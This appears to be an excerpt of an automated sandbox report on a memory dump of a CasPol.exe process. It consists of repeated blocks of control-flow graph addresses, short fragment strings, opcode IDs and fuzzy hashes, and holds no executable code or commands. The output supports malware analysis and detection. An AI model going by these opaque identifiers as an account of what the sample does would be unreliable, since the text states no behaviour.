                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2071 1f71cf38-1f71d426 2146 1f71d978-1f71d9ad 2071->2146 2147 1f71d42c-1f71d43c 2071->2147 2151 1f71d9b9-1f71d9d7 2146->2151 2152 1f71d9af-1f71d9b4 2146->2152 2147->2146 2148 1f71d442-1f71d452 2147->2148 2148->2146 2150 1f71d458-1f71d468 2148->2150 2150->2146 2153 1f71d46e-1f71d47e 2150->2153 2164 1f71d9d9-1f71d9e3 2151->2164 2165 1f71da4e-1f71da5a 2151->2165 2154 1f71da9e-1f71daa3 2152->2154 2153->2146 2155 1f71d484-1f71d494 2153->2155 2155->2146 2156 1f71d49a-1f71d4aa 2155->2156 2156->2146 2158 1f71d4b0-1f71d4c0 2156->2158 2158->2146 2159 1f71d4c6-1f71d4d6 2158->2159 2159->2146 2161 1f71d4dc-1f71d4ec 2159->2161 2161->2146 2163 1f71d4f2-1f71d502 2161->2163 2163->2146 2166 1f71d508-1f71d977 2163->2166 2164->2165 2170 1f71d9e5-1f71d9f1 2164->2170 2171 1f71da71-1f71da7d 2165->2171 2172 1f71da5c-1f71da68 2165->2172 2179 1f71d9f3-1f71d9fe 2170->2179 2180 1f71da16-1f71da19 2170->2180 2177 1f71da94-1f71da96 2171->2177 2178 1f71da7f-1f71da8b 2171->2178 2172->2171 2182 1f71da6a-1f71da6f 2172->2182 2177->2154 2178->2177 2191 1f71da8d-1f71da92 2178->2191 2179->2180 2193 1f71da00-1f71da0a 2179->2193 2183 1f71da30-1f71da3c 2180->2183 2184 1f71da1b-1f71da27 2180->2184 2182->2154 2186 1f71daa4-1f71dab4 2183->2186 2187 1f71da3e-1f71da45 2183->2187 2184->2183 2194 1f71da29-1f71da2e 2184->2194 2197 1f71dab6-1f71dac9 2186->2197 2198 1f71daca-1f71daf0 2186->2198 2187->2186 2192 1f71da47-1f71da4c 2187->2192 2191->2154 2192->2154 2193->2180 2201 1f71da0c-1f71da11 2193->2201 2194->2154 2197->2198 2292 1f71daf3 call 1f71dc78 2198->2292 2293 1f71daf3 call 1f71dc68 2198->2293 2201->2154 2204 1f71daf9-1f71db00 2205 1f71db13-1f71db1e 2204->2205 2206 1f71db02-1f71db0d 2204->2206 2212 1f71db24-1f71db93 2205->2212 2213 1f71dbef-1f71dc2b 2205->2213 2206->2205 2211 1f71db96-1f71dbe8 2206->2211 2211->2213 2226 1f71dc32-1f71dc34 2213->2226 2227 1f71dc2d call 1f71c9b0 2213->2227 2229 1f71dc45-1f71dc53 2226->2229 2230 1f71dc36-1f71dc43 2226->2230 2227->2226 2238 1f71dc61 2229->2238 2239 1f71dc55-1f71dc5f 2229->2239 2237 1f71dc63-1f71dc66 2230->2237 2238->2237 2239->2237 2292->2204 2293->2204
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (oi$$i$$i
                                                              • API String ID: 0-486549996
                                                              • Opcode ID: 054f120c223c3cb2eb1dd7cc12fc5ef54c216356ac1924e9bdb3811b1487d9eb
                                                              • Instruction ID: 00c7c5726b400c34941c262ff26cf8b34be9256dd8e06281ab8be56716076c81
                                                              • Opcode Fuzzy Hash: 054f120c223c3cb2eb1dd7cc12fc5ef54c216356ac1924e9bdb3811b1487d9eb
                                                              • Instruction Fuzzy Hash: 7D728234A04208CFDB54DFA4C954B9EBB72EF89304F1581A9D60A6B395CF34AD85CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2294 1f714e78-1f714e84 2295 1f714e86-1f714e88 2294->2295 2296 1f714e8d-1f714e9d 2294->2296 2297 1f71531c-1f715324 2295->2297 2299 1f714ea3-1f714eb1 2296->2299 2300 1f715325-1f7153a6 2296->2300 2299->2300 2303 1f714eb7 2299->2303 2313 1f7153c7-1f7153ca 2300->2313 2314 1f7153a8-1f7153ae 2300->2314 2303->2297 2317 1f7153eb-1f7153ed 2313->2317 2318 1f7153cc 2313->2318 2315 1f7153b0-1f7153b2 2314->2315 2316 1f7153cf-1f7153d2 2314->2316 2319 1f7153d3-1f7153d4 2315->2319 2320 1f7153b4-1f7153b6 2315->2320 2316->2319 2324 1f7153f3-1f7153f8 2316->2324 2321 1f7153ef-1f7153f1 2317->2321 2322 1f715420-1f715423 2318->2322 2323 1f7153ce 2318->2323 2325 1f7153d7-1f7153da 2319->2325 2320->2325 2326 1f7153b8-1f7153ba 2320->2326 2321->2324 2323->2316 2323->2321 2327 1f7153fb 2324->2327 2325->2327 2328 1f7153db-1f7153de 2325->2328 2326->2328 2329 1f7153bc-1f7153be 2326->2329 2330 1f7153ff 2327->2330 2328->2330 2331 1f7153df-1f7153e0 2328->2331 2329->2331 2332 1f7153c0 2329->2332 2333 1f715400-1f71540b 2330->2333 2334 1f715424-1f71544f 2330->2334 2335 1f7153e3-1f7153e6 2331->2335 2336 1f715412-1f71541e 2332->2336 2337 1f7153c2 2332->2337 2333->2322 2338 1f71540c-1f71540f 2333->2338 2342 1f715451-1f71545b 2334->2342 2343 1f715474-1f7154ab 2334->2343 2340 1f7153e7-1f7153ea 2335->2340 2336->2322 2337->2335 2341 1f7153c4-1f7153c6 2337->2341 2338->2336 2340->2317 2341->2313 2341->2340 2345 1f715470-1f715473 2342->2345 2346 1f71545d-1f71546e 2342->2346 2349 1f7154ad-1f7154b0 2343->2349 2346->2345 2350 1f7154b2-1f7154bb 2349->2350 2351 1f7154c6-1f7154c9 2349->2351 2352 1f7154c1-1f7154c3 2350->2352 2353 1f71563d 2350->2353 2354 1f71550b-1f71550e 2351->2354 2355 1f7154cb-1f7154d2 2351->2355 2352->2351 2362 1f715642-1f715667 2353->2362 2358 1f715510 2354->2358 2359 1f715515-1f715518 2354->2359 2356 1f7154d4-1f7154d8 2355->2356 2357 1f7154d9-1f7154ea 2355->2357 2356->2357 2357->2353 2363 1f7154f0-1f715504 2357->2363 2358->2359 2360 1f715523-1f715526 2359->2360 2361 1f71551a-1f71551c 2359->2361 2365 1f715565-1f715568 2360->2365 2366 1f715528-1f71552e 2360->2366 2361->2355 2364 1f71551e 2361->2364 2380 1f715669-1f715673 2362->2380 2381 1f71568c-1f7156b4 2362->2381 2363->2366 2367 1f715506 2363->2367 2364->2360 2370 1f715578-1f71557b 2365->2370 2371 1f71556a-1f71556d 2365->2371 2366->2362 2368 1f715534-1f715560 2366->2368 2367->2354 2368->2365 2372 1f715594-1f715597 2370->2372 2373 1f71557d-1f71558f 2370->2373 2371->2353 2374 1f715573 2371->2374 2377 1f715599-1f7155ad 2372->2377 2378 1f7155ca-1f7155cd 2372->2378 2373->2372 2374->2370 2392 1f7155b3 2377->2392 2393 1f7155af-1f7155b1 2377->2393 2378->2361 2382 1f7155d3-1f7155d6 2378->2382 2386 1f715675-1f715686 2380->2386 2387 1f715688-1f71568b 2380->2387 2400 1f7156b6-1f7156c0 2381->2400 2401 1f7156d9-1f7156fc 2381->2401 2383 1f7155d8-1f7155f9 2382->2383 2384 1f7155fe-1f715600 2382->2384 2383->2384 2390 1f715602 2384->2390 2391 1f715607-1f71560a 2384->2391 2386->2387 2390->2391 2391->2349 2396 1f715610-1f71563c 2391->2396 2399 1f7155b6-1f7155c5 2392->2399 2393->2399 2399->2378 2402 1f7156c2-1f7156d3 2400->2402 2403 1f7156d5-1f7156d8 2400->2403 2410 1f715721-1f715744 2401->2410 2411 1f7156fe-1f715708 2401->2411 2402->2403 2419 1f715766-1f71578c 2410->2419 2420 1f715746-1f71574d 2410->2420 2413 1f71570a-1f71571b 2411->2413 2414 1f71571d-1f715720 2411->2414 2413->2414 2425 1f7157ae-1f715823 2419->2425 2426 1f71578e-1f715795 2419->2426 2421 1f715762-1f715765 2420->2421 2422 1f71574f-1f715760 2420->2422 2422->2421 2439 1f715825-1f71582c call 1f7148a0 2425->2439 2440 1f71583f-1f71588b 2425->2440 2428 1f715797-1f7157a8 2426->2428 2429 1f7157aa-1f7157ad 2426->2429 2428->2429 2442 1f715831-1f71583e 2439->2442
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRi$LRi$Xi
                                                              • API String ID: 0-49143727
                                                              • Opcode ID: 271007a30a8b368a958871cb7f19a2239e37c6e7d46e50a9eec70ec171f4ef98
                                                              • Instruction ID: 4102b5796079f30dc308630988ee806817839fe2890462b7ab017fa3122b83c3
                                                              • Opcode Fuzzy Hash: 271007a30a8b368a958871cb7f19a2239e37c6e7d46e50a9eec70ec171f4ef98
                                                              • Instruction Fuzzy Hash: 00F15934B0D3814FC70A8738885469A7FA2DFC6218F1E85AAD545DF293DF35DC4987A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3402 1f71e140-1f71e15f 3405 1f71e2c2-1f71e356 3402->3405 3406 1f71e165-1f71e167 3402->3406 3449 1f71e375-1f71e379 3405->3449 3450 1f71e358-1f71e374 3405->3450 3407 1f71e1a4-1f71e1b6 3406->3407 3408 1f71e169-1f71e173 3406->3408 3417 1f71e1c3-1f71e1c5 3407->3417 3418 1f71e1b8-1f71e1c1 3407->3418 3413 1f71e175-1f71e198 3408->3413 3414 1f71e19d-1f71e19f 3408->3414 3415 1f71e2ba-1f71e2bf 3413->3415 3414->3415 3421 1f71e1d3-1f71e1d5 3417->3421 3422 1f71e1c7-1f71e1d1 3417->3422 3418->3417 3421->3415 3422->3421 3428 1f71e1da 3422->3428 3431 1f71e1e2-1f71e1ec 3428->3431 3435 1f71e211-1f71e21f 3431->3435 3436 1f71e1ee-1f71e200 3431->3436 3441 1f71e221-1f71e223 3435->3441 3442 1f71e228-1f71e232 3435->3442 3436->3435 3446 1f71e202-1f71e20c 3436->3446 3441->3415 3447 1f71e262-1f71e26c 3442->3447 3448 1f71e234-1f71e23e 3442->3448 3446->3415 3455 1f71e291-1f71e297 3447->3455 3456 1f71e26e-1f71e278 3447->3456 3448->3447 3457 1f71e240-1f71e246 3448->3457 3460 1f71e2b0-1f71e2b2 3455->3460 3461 1f71e299-1f71e2a2 call 1f71a720 3455->3461 3456->3455 3466 1f71e27a-1f71e28f 3456->3466 3458 1f71e248 3457->3458 3459 1f71e24a-1f71e256 3457->3459 3464 1f71e258-1f71e260 3458->3464 3459->3464 3460->3415 3461->3460 3470 1f71e2a4-1f71e2ae 3461->3470 3464->3415 3466->3415 3470->3415
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hi$$i$$i
                                                              • API String ID: 0-635199293
                                                              • Opcode ID: 99a442ebce199f59d6d1f1f6ce731a22782dc5b8b2ba894052d8f324f7480e8e
                                                              • Instruction ID: 0fe17c4ef4c353bd578327e71285842fb11cd87a955cf21d961a0368df88abf2
                                                              • Opcode Fuzzy Hash: 99a442ebce199f59d6d1f1f6ce731a22782dc5b8b2ba894052d8f324f7480e8e
                                                              • Instruction Fuzzy Hash: 9751C53170CA208FDB095B7588A956E3BEB9FC965131A486DD902CF391EF35EC0687D2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 4536 1f715f13-1f716892 4720 1f716897 call 1f718c63 4536->4720 4721 1f716897 call 1f718c68 4536->4721 4703 1f71689d-1f7168c9 4707 1f7168cb-1f7168e7 4703->4707 4708 1f71690e-1f716935 4703->4708 4715 1f7168e9-1f7168f7 4707->4715 4716 1f7168fe-1f71690c 4707->4716 4713 1f716943 4708->4713 4714 1f716937 4708->4714 4717 1f716944 4713->4717 4714->4713 4715->4716 4716->4707 4716->4708 4717->4717 4720->4703 4721->4703
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRi$PHi
                                                              • API String ID: 0-1062753908
                                                              • Opcode ID: 8c517789cd32abe23ad0dd7ae5c7c113cad69a8af15fd5b5bfabd9e55290bc47
                                                              • Instruction ID: e17c75a6f52ae93ea58c54792ddebb21d19fff407dcf342e7259fdca4fc279a7
                                                              • Opcode Fuzzy Hash: 8c517789cd32abe23ad0dd7ae5c7c113cad69a8af15fd5b5bfabd9e55290bc47
                                                              • Instruction Fuzzy Hash: 42421B74A402289FCB25DF20C99C7ADB7BABB89304F1045D9E81AA7391DF316E85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 4722 1f715f20-1f716892 4906 1f716897 call 1f718c63 4722->4906 4907 1f716897 call 1f718c68 4722->4907 4889 1f71689d-1f7168c9 4893 1f7168cb-1f7168e7 4889->4893 4894 1f71690e-1f716935 4889->4894 4901 1f7168e9-1f7168f7 4893->4901 4902 1f7168fe-1f71690c 4893->4902 4899 1f716943 4894->4899 4900 1f716937 4894->4900 4903 1f716944 4899->4903 4900->4899 4901->4902 4902->4893 4902->4894 4903->4903 4906->4889 4907->4889
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRi$PHi
                                                              • API String ID: 0-1062753908
                                                              • Opcode ID: 63ba2097d7d3ae71e215902575f943da512665b0c30e922b523a159c8439917c
                                                              • Instruction ID: 798343a12e50df9d6cbaab92a2775b2b120acf63f74ac5184776dee56791663c
                                                              • Opcode Fuzzy Hash: 63ba2097d7d3ae71e215902575f943da512665b0c30e922b523a159c8439917c
                                                              • Instruction Fuzzy Hash: E5421A74A402289FCB25DF20C99C7ADB7BABB89304F1045D9E81AA7391DF316E85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xi$Xi
                                                              • API String ID: 0-2077334947
                                                              • Opcode ID: c10ae93c3a44a0fe7f3c4d3ed70e0354336879384e1fd2f5548b7ac812d76327
                                                              • Instruction ID: 9e87566e7c87cdb1f2ce3970263d810cf5c521bffc81b4ed16fcb8fc7e410039
                                                              • Opcode Fuzzy Hash: c10ae93c3a44a0fe7f3c4d3ed70e0354336879384e1fd2f5548b7ac812d76327
                                                              • Instruction Fuzzy Hash: 58A10330F0C2558FCB04DBA8D5446AEBBF6AFC9314F25896AC9059F355EB30AC45CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hi$Hi
                                                              • API String ID: 0-272315893
                                                              • Opcode ID: fa502df1e65280922b81292c887c09b73768d2b72d10ffe1d7ac9ec72785857f
                                                              • Instruction ID: 0f19e06e0c662211b4d89bbf09ad0933abc1261d0373fce5c4f26ca573ac922d
                                                              • Opcode Fuzzy Hash: fa502df1e65280922b81292c887c09b73768d2b72d10ffe1d7ac9ec72785857f
                                                              • Instruction Fuzzy Hash: B6A1F3307082518FDB169F64C498A6E7BE6EF8A314F058569E906CF381DF35DC068791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,i$,i
                                                              • API String ID: 0-1148709749
                                                              • Opcode ID: b18bd5fa1f1bf7fa60f8b9d94e378c7f0a8a7148325fbe72259116194acad811
                                                              • Instruction ID: 2e94392201395a0d570bf3d84b46dc4684b134df6973e9f436c5abedb670c1f3
                                                              • Opcode Fuzzy Hash: b18bd5fa1f1bf7fa60f8b9d94e378c7f0a8a7148325fbe72259116194acad811
                                                              • Instruction Fuzzy Hash: 0591BE30A08A05CFEB00EF68C8859AAB7F2FF89315B15816AD415DF365E731EC49CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'i
                                                              • API String ID: 0-2027157062
                                                              • Opcode ID: 3856d1e1500262b0aa3be5a437a250f34ed9f91d7266add1e914f11ee6034cf5
                                                              • Instruction ID: d761dbb9ee3aa97d09916f83075b2547cd7924d3e711e204e452559fd4af0fcf
                                                              • Opcode Fuzzy Hash: 3856d1e1500262b0aa3be5a437a250f34ed9f91d7266add1e914f11ee6034cf5
                                                              • Instruction Fuzzy Hash: 376193317089598FD704DFB9C884AAA7BE9AF8575070645B9E845CF361EB31EC18CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hi
                                                              • API String ID: 0-1281514624
                                                              • Opcode ID: decbd1fa35f5748925d12b0a96c59f136ff4f87423b57ff5da30e56966b27ca2
                                                              • Instruction ID: 966baa154d2928e6ad3e473d723d76c406c2bfd235b34a28c578648f82c6c648
                                                              • Opcode Fuzzy Hash: decbd1fa35f5748925d12b0a96c59f136ff4f87423b57ff5da30e56966b27ca2
                                                              • Instruction Fuzzy Hash: C34106313082558FCB06CF24D854A6A3BB6EF89350F058869F905CF3A2CB35EC19C7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'i
                                                              • API String ID: 0-2027157062
                                                              • Opcode ID: 73383103b685c3cdd8b847080238bf18a1c21601e861a9e6cc749aae274381c7
                                                              • Instruction ID: 01d98966061ee74e34cb4c186e3b83f5757d3016eba6c190479d2db9c7040a4e
                                                              • Opcode Fuzzy Hash: 73383103b685c3cdd8b847080238bf18a1c21601e861a9e6cc749aae274381c7
                                                              • Instruction Fuzzy Hash: F64167756046259FCB05CFA8D888EAE7BB6FB88311F014169F901CB3A1C731EC54CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRi
                                                              • API String ID: 0-2928678485
                                                              • Opcode ID: e14c717f6f96d36ea763468a407857a50d6bb0e7eb9c4d6bf65d45f464564159
                                                              • Instruction ID: dea0a314c0437cc320d7d599cc3cab177aea7ecbc4bb03fd99af58154879c6dc
                                                              • Opcode Fuzzy Hash: e14c717f6f96d36ea763468a407857a50d6bb0e7eb9c4d6bf65d45f464564159
                                                              • Instruction Fuzzy Hash: 98F0C831B042149FC708ABB9D01465E7BEAEBCA714F11807ED41ACB351DF72AC4587D2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cc614313a08c334b44f837fdb2cee7221901797b66490fa7f89112bc096455c
                                                              • Instruction ID: 39ae93198e1f2f93f1b3409d1e1170e0c7fe74955ec34e3302e6406010ec86c9
                                                              • Opcode Fuzzy Hash: 4cc614313a08c334b44f837fdb2cee7221901797b66490fa7f89112bc096455c
                                                              • Instruction Fuzzy Hash: 98521174A01228CFCB65DF30C89869EB7B6BF89309F5041EAD40AA7355DB31AE85CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1d9bd24064972b99ea964394ecb6bb514424b11cfc35ac9887440f65ad3a12e
                                                              • Instruction ID: 50dedf5a04dcad699c43d6c7f423a3a3485198b3d998dcf8babff69fbd59dce8
                                                              • Opcode Fuzzy Hash: c1d9bd24064972b99ea964394ecb6bb514424b11cfc35ac9887440f65ad3a12e
                                                              • Instruction Fuzzy Hash: BEF1C2B4A45228CFCB65DF30C98C69DB7BABF49319F5042EAD40AA6244DB319E85CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 680f3a8379fd4d6128c23e902102ef55b3af7027321e5645aaed9f5d630565e3
                                                              • Instruction ID: c93365a2892fe80b47ffb5f77b6365f74ebbbaa7d1c70db4bea9ad81f1ca9632
                                                              • Opcode Fuzzy Hash: 680f3a8379fd4d6128c23e902102ef55b3af7027321e5645aaed9f5d630565e3
                                                              • Instruction Fuzzy Hash: 69F1C274A45228CFCB65DF30C98C69EB7BABF89309F5041EAD40AA7244DB319E85CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 149969817156da893febf3c6e0f16687dbdff84691ba54d492b14386d55b2f54
                                                              • Instruction ID: 313209bd0ad26948a63d218d01fc4bedc77816f6784e1f875985dfa7b4cc7e96
                                                              • Opcode Fuzzy Hash: 149969817156da893febf3c6e0f16687dbdff84691ba54d492b14386d55b2f54
                                                              • Instruction Fuzzy Hash: 22F1C2B4A45228CFCB65DF70C98C69DB7BABF89309F5041EAD40AA7244DB319E85CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f4cf6ccdc1b56ff1ee2ea884767d3074cb2a3f96c8362737ec22f392f250e7dd
                                                              • Instruction ID: f007d271e4eb97d12d39d614555b879ecc0a169ec1e93cd0aa8bd544a7d30429
                                                              • Opcode Fuzzy Hash: f4cf6ccdc1b56ff1ee2ea884767d3074cb2a3f96c8362737ec22f392f250e7dd
                                                              • Instruction Fuzzy Hash: 4DF1C374A45228CFCB65DF30C99C69DB7BABF89309F5041EAD40AA7244DB319E86CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a78675c221e76ddff4d72f1574e4899aa7fdabe46d5bc2a2e4773ee66ff73b73
                                                              • Instruction ID: 1a966d8412b55ac77a9ccff0b732869b552aa0a97e01c6c294c3b374615b652d
                                                              • Opcode Fuzzy Hash: a78675c221e76ddff4d72f1574e4899aa7fdabe46d5bc2a2e4773ee66ff73b73
                                                              • Instruction Fuzzy Hash: 42E1D374A45228CFCB65DF30C98C69DB7BABF89309F5041EAD40AA7244DB319E85CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 992b6aedf6329c10451a9da4285fc90b162e1af618146ee7a1489c79d355f76b
                                                              • Instruction ID: 4c53ba8c180082c35d4f0f23c3452dec01f414697ee9d9c82bd46aaeda43cb27
                                                              • Opcode Fuzzy Hash: 992b6aedf6329c10451a9da4285fc90b162e1af618146ee7a1489c79d355f76b
                                                              • Instruction Fuzzy Hash: 6BE1D374A45228CFCB65DF30C98C69DB7BABF89309F5041EAD40AA7244DB319E86CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd9c1eb51c5f548b0564385a5fbd1755b8e80aa293d287a25e0d2c5ce938df0a
                                                              • Instruction ID: cbf78e643c93e0bd73b61a3e5688144e21e41f4d4cfcc390290650660f972beb
                                                              • Opcode Fuzzy Hash: bd9c1eb51c5f548b0564385a5fbd1755b8e80aa293d287a25e0d2c5ce938df0a
                                                              • Instruction Fuzzy Hash: A1E1D474A45228CFCB65DF70C98C69EB7BABF89309F5041EAD40AA7244DB319E85CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9749152525145b8e7aa890925e219f86368060df9d79848b2e08b235ea76164b
                                                              • Instruction ID: 77cde3e676eed9a884db0ccf1133251c953f5fd65bc162f8eef097199192bf07
                                                              • Opcode Fuzzy Hash: 9749152525145b8e7aa890925e219f86368060df9d79848b2e08b235ea76164b
                                                              • Instruction Fuzzy Hash: E1E1D474A45228CFCB65DF30C98C69DB7BABF89309F5041EAD40AA7245DB319E86CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
